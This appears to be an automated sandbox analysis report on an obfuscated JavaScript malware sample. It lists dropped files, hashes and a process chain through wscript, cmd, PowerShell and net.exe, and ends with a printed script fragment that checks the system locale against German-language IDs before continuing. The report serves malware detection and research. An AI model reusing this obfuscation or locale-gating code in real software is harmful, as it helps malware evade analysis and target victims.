SHA-512: | 260149958C04FC245746A2B9A280B7F36E63934A5998FCE47218EC76D689EFFFEE1EB7D96615DB0F1E9D9597D1CA1EC1F1400413D70C1A1CC9654B026AF56409 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.664429713708593 |
Encrypted: | false |
SSDEEP: | 24:Yv6XmzvrmamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSG9A:Yv5MBgkDMUJUAh8cvMG9A |
MD5: | 41735B716E915E45BF317B3F5B4E84F5 |
SHA1: | B0AFE95870684776735094824EC6300CC7BE6D37 |
SHA-256: | 656194980939A414B1BD9A3AC028DDBF6224EBC5134DD370E7073D9D24E80172 |
SHA-512: | E91CAF724926096E63053822C7BA2481D042194E48ADCE812B1AC52C56BC8769357A62960EAC8332DF057DF4031A65F0EF886EF0DEDC2ADA56835C03A1EA97E3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.273618580330562 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJfshHHrPeUkwRe9:YvXKXDLV9LSZc0vxVVGUUUkee9 |
MD5: | C72E6556ADAB069D61759D9167EE17A9 |
SHA1: | 76AB6E5A3D8FCB2E4B55D197B1913B7013D1170F |
SHA-256: | EE4F8DBF7FFAF85B21075A13B2838107DEEFB56B402C7AB084C5DAAAF01D36F7 |
SHA-512: | FC20677DC3670D7F74B37DE05D5BC6AC5C01046B6ADFAE9D40074F5B0FB2987BF8FF1338455316F16EF77A51053FD8B0B01A94A894EFDF5512686E7E550CD6D2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.274865401418461 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXc+L8E9LVJnVoZcg1vRcR0YaJ2EeoAvJTqgFCrPeUkwRe9:YvXKXDLV9LSZc0vxVVGTq16Ukee9 |
MD5: | 7D0CB20789381A3ABAEDD0358A9E574C |
SHA1: | 0CCEE2105E8DC34C4B05FD14747F1B54B7159CAB |
SHA-256: | 0A6BE699116E57BF05CF2DDD27FF2F9BD1996110F83AEEE6B60FC767E2DDEC8B |
SHA-512: | 72D25E2EBA2B2B4A88144CBEAC6D431BD157A9FDF0AAF08CBE6FFD13DBA783D13AEB62DF662554857331044DEAC9EFA062A920979BC0B10C46DAEDE2AC51B527 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.138920016254474 |
Encrypted: | false |
SSDEEP: | 48:YV4IrmvQncG90XSW+1et+b8vEiDGsJD0D8D5ZnuaWNU9/igZ:CLcGli+zhu5ZT7 |
MD5: | F5F6FAB08211966C9A26B55AFC23C688 |
SHA1: | 2AF3BFE406A71479751A3ACFFBC5F1A54A53FED3 |
SHA-256: | 6F57BB1A630E74E35D41A30843902BD4F1CC26552D7066C4C9ABB018953F9683 |
SHA-512: | 91D7F3DDA9CE34DB2AE6D1CE2598E6DCB6F7229491B0569C182071E6188813A0F1DB4FDEFE88B412186C4D36D7D979D386F984C65368E877E58445FB7D9231E0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.189800229199982 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUgSvR9H9vxFGiDIAEkGVvpy:lNVmswUUUUUUUUg+FGSIt+ |
MD5: | EB471885057AF954EED2188FFB55BCF9 |
SHA1: | E1844A69A16EF8CE80FCA81D23022C020280895C |
SHA-256: | A8375BE9864AD4455E56D0FD25C2533C3C6C052CAAB33D00C76288622B254216 |
SHA-512: | E57F13E6AC8FC11BD4D96C2477917CDD1CE4D4AB08FB87ED8D5B2FF1FA706DD00CA917FCAC65E52FB2C0172340EE1C2FD075C4626FA9B97D1A39C97CF6C85F3F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.6100180992828432 |
Encrypted: | false |
SSDEEP: | 48:7McKUUUUUUUUUUSvR9H9vxFGiDIAEkGVvlqFl2GL7msq:70UUUUUUUUUU+FGSItjKVmsq |
MD5: | F0431AC2D4A6E3DF7BF36D9B38F7EB26 |
SHA1: | F28411722454B2106C6FBDF137A4FCB243B02392 |
SHA-256: | 0960F3FA1534E594DD4A9E854BE80E7179F1F86309633CA69E4C961748BFEED3 |
SHA-512: | 49CE905813115AE26D1DF604D828A9195FCA6DD6A08941D1B14878D47B7264F18FDEC76CB8D5AF7A92AE828DBBCD927397BF74EB55D166E3C1F5F6F22F896128 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgepVcZwA2wjY3bgy2Jq2/7GOYyu:6a6TZ44ADE+wj+gy2Jq2/3K |
MD5: | 8CCE8909B21C150AAC2A7C210F0AE0E5 |
SHA1: | AE4F1BD15C0532B54DE85616A1227FDBC40BBEBA |
SHA-256: | C755CF1C823CB56C0C951F617A946FEF5DD83743858854F768A6984AF5162A06 |
SHA-512: | E3EFBA287C9308B54F10CC4A708A5493ED77850EBC094C7B154EA6C1B8F8C7E5D0E021A4AA1604B93FFD5B46EF7AC70A05B4D2E0C7B5E5DC8D6D003D0114E182 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllultnxj:NllU |
MD5: | F93358E626551B46E6ED5A0A9D29BD51 |
SHA1: | 9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03 |
SHA-256: | 0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D |
SHA-512: | D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4973455600014702 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEM2lwCH:Qw946cPbiOxDlbYnuRK+bDPl |
MD5: | DE294B61DA5019E1603CEB756B75979D |
SHA1: | 2C8CAB51715443ECB75708333DC0A094A187FF15 |
SHA-256: | BCDD2BDFDD40B1B75383490901E572028E664F9A48DE3A9C641AB76E47C0CAD7 |
SHA-512: | 8C999A47C79471AE06B01B4F05C6950034F606D5896E110891B7091D7B92E1E81750853CD0EA825C24103449E18BA4972B442E71AB943DD44EA43E0B3108CED3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 13-30-56-035.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.301840317377028 |
Encrypted: | false |
SSDEEP: | 384:e//MxM0MJMPM6Mp9MyMhMHMCMY9vroorrruKsLgk6k2VlVZVMVD+FrutuNubuH/m:SOT |
MD5: | C1EE711F6CDB7947808E2864369DF862 |
SHA1: | 2CD55038CABDC8C1B3C1C92BE95B65802E3C40A6 |
SHA-256: | B2F0D0DE61CFCF043209F9FD3364064B14D73055410056052399DEA4E79029A8 |
SHA-512: | 47A36DAB0A15DE8CBEC96DB13CB79276CE171DC735B076725E9E2DAFA4B8F30958CFFD1536691B71FF67862B380CDD597EC8B2E983FF419810BC78D4C6F97E76 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.387063998871671 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rO:9g |
MD5: | B089E3807BE84E31399DDF8DDA2BEDCF |
SHA1: | 99E1147468AE7899B812AA31A21CBB9F67E70078 |
SHA-256: | 5F5269451718E5FD0FCC89A20AA72E661A10A017B983919B1B9AA1FA71054B5F |
SHA-512: | 19FA2CEE1EF28047473537DF67D3B8B522EA1477DA869FF9FF9954A798F86BFC859E846B49B777E14824584FA04B4C540D7D9A7A48B4D300692401638A791488 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru |
MD5: | 18E3D04537AF72FDBEB3760B2D10C80E |
SHA1: | B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC |
SHA-256: | BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4 |
SHA-512: | 2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.901671681900272 |
TrID: | |
File name: | 958713604204492412.js |
File size: | 19'674 bytes |
MD5: | f769fc58b97062a34d62ca9c45618fb5 |
SHA1: | d8981edcf83fd3f86c8f6ca5c3dcd7f7ba295f1e |
SHA256: | 27de0a1d439ad26d7bb6841085a3455e6593a70c182c552b52ea0e6fc6c10f13 |
SHA512: | c5feaf7afbf1a8652bdf143b888a1fd9d2289e89d17ab1b4abce2ecfe1d08932baf1c9102794433050fcfe863426d738c7671e7905d344581c751c728a15898c |
SSDEEP: | 384:SSqZiE4Jq8KPxTogWQYWL3XJfBIH+xUUsR5pAXqnMVE+CAo//p4+IBx2y:SSsZTogWZWL3XJfBIH+xUUsR5pAXqnMf |
TLSH: | 62927787EED55F1793EDE134817218F66E3C2289E374F9C8D0D0149AAD42AB252F48BD |
File Content Preview: | function dfiqn(){hzpyfvmfn=[1031,3079,5127,4103,2055,3072];var qceceafqd=this[yjrezl+byxiqg+umconock+nrqacu+ebpuax+fkgzve+hyxioi+fwvhhu](this[plyrm+yrkpssao+vzihw+umconock+lfnnk+yjrezl+fwvhhu][ygpicveyl+umconock+ebpuax+byxiqg+fwvhhu+ebpuax+jiadq+grsfp+jmx |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 13:30:47 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6988b0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 13:30:47 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62d5d0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 13:30:47 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 13:30:47 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 13:30:52 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 13:30:52 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62d5d0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 13:30:52 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7f3fd0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 13:30:53 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 13:30:53 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 13:30:53 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function dfiqn() { |
|
1 | hzpyfvmfn = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var qceceafqd = this[yjrezl + byxiqg + umconock + nrqacu + ebpuax + fkgzve + hyxioi + fwvhhu] ( this[plyrm + yrkpssao + vzihw + umconock + lfnnk + yjrezl + fwvhhu][ygpicveyl + umconock + ebpuax + byxiqg + fwvhhu + ebpuax + jiadq + grsfp + jmxst + ebpuax + vzihw + fwvhhu] ( plyrm + yrkpssao + vzihw + umconock + lfnnk + yjrezl + fwvhhu + ezvmgi + yrkpssao + leqjnkin + ebpuax + yjhhb + yjhhb ) [hlxzqpip + ebpuax + dxbgjacs + hlxzqpip + ebpuax + byxiqg + dmeqkmac] ( xwlnobpg + hxqcyhxwb + hrepmc + zfnnaw + ztujv + ygpicveyl + glilcdfn + hlxzqpip + hlxzqpip + hrepmc + zxbdwfm + ebovu + ztujv + glilcdfn + yrkpssao + hrepmc + hlxzqpip + qzgaasljd + ygpicveyl + lttwqewkl + hyxioi + fwvhhu + umconock + lttwqewkl + yjhhb + hxjfbdrze + vkrjgerz + byxiqg + hyxioi + ebpuax + yjhhb + qzgaasljd + fkgzve + hyxioi + fwvhhu + ebpuax + umconock + hyxioi + byxiqg + fwvhhu + lfnnk + lttwqewkl + hyxioi + byxiqg + yjhhb + qzgaasljd + derhaa + lttwqewkl + vzihw + byxiqg + yjhhb + ebpuax ), 16 ); |
|
3 | for ( dralhc = 0 ; dralhc < hzpyfvmfn[yjhhb + ebpuax + hyxioi + dxbgjacs + fwvhhu + leqjnkin] ; ++ dralhc ) | |
4 | { | |
5 | if ( qceceafqd == hzpyfvmfn[dralhc] ) | |
6 | { | |
7 | qceceafqd = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( qceceafqd !== true ) | |
12 | this[plyrm + yrkpssao + vzihw + umconock + lfnnk + yjrezl + fwvhhu][vbwvnt + vjmlu + lfnnk + fwvhhu] ( ); | |
